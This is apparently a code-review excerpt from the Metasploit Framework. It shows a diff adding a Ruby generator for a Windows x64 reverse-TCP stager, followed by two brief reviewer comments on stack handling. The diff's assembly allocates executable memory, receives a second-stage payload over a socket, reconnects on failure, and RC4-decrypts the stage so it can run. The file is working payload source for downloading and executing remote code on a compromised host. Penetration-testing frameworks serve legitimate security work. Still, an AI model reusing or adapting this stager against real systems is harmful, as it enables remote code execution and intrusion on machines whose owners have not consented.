lib/msf/core/payload/windows/x64/reverse_tcp_rc4.rb

```diff
@@ -0,0 +1,191 @@
+        call rbp                ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+        ; Receive the second stage and execute it...
+        ; mov rbx, rax            ; rbx = our new memory address for the new stage
+        lea rbx, [rax+0x100]
+        ; mov r15, rax            ; save the address so we can jump into it later
+        mov r15, rbx
+	push rbx              ; save stage address
+        push rsi              ; push stage length
+        push rax              ; push the address of the S-box
+
+      read_more:                ;
+        xor r9, r9              ; flags
+        mov r8, rsi             ; length
+        mov rdx, rbx            ; the current address into our second stages RWX buffer
+        mov rcx, rdi            ; the saved socket
+        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
+        call rbp                ; recv( s, buffer, length, 0 );
+        add rsp, 32             ; restore stack after api_call
+    ^
+
+    if reliable
+      asm << %Q^
+      ; reliability: check to see if the recv worked, and reconnect
+      ; if it fails
+        cmp eax, 0
+        jge read_successful
+
+      ; something failed so free up memory
+        pop rax
+        push r15
+        pop rcx                 ; lpAddress
+        push 0x4000             ; MEM_COMMIT
+        pop r8                  ; dwFreeType
+        push 0                  ; 0
+        pop rdx                 ; dwSize
+        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
+        call rbp                ; VirtualFree(payload, 0, MEM_COMMIT)
+
+      cleanup_socket:
+      ; clean up the socket
+        push rdi                ; socket handle
+        pop rcx                 ; s (closesocket parameter)
+        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
+        call rbp
+
+      ; and try again
+        dec r14                 ; decrement the retry count
+        jmp create_socket
+      ^
+    end
+
+    asm << %Q^
+      read_successful:
+        add rbx, rax            ; buffer += bytes_received
+        sub rsi, rax            ; length -= bytes_received
+        ; test rsi, rsi           ; test length
+        jnz read_more           ; continue if we have more to read
+        mov r14, rdi            ; save socket handle
+        pop rdi                 ; address of S-box
+        pop rcx                 ; stage length
+        pop r9                  ; address of stage
+        push rbp                ; push back so we can return into it
+        push r14                ; save socket
+        call after_key          ; Call after_key, this pushes the address of the key onto the stack.
+        db #{raw_to_db(opts[:rc4key])}
+      after_key:
+        pop rsi                 ; rsi = RC4 key
+      #{asm_decrypt_rc4}
+        pop rdi                 ; restrore socket handle
+        pop rbp                 ; restore rbp
```

Comment:
... but then you can remove this pop RBP and the associated push RBP in line 170 as well .

Reply:
Apart from that, I don't see any obvious mistakes. Did not test it though (and the payload creation changed a lot since I last touched it :D )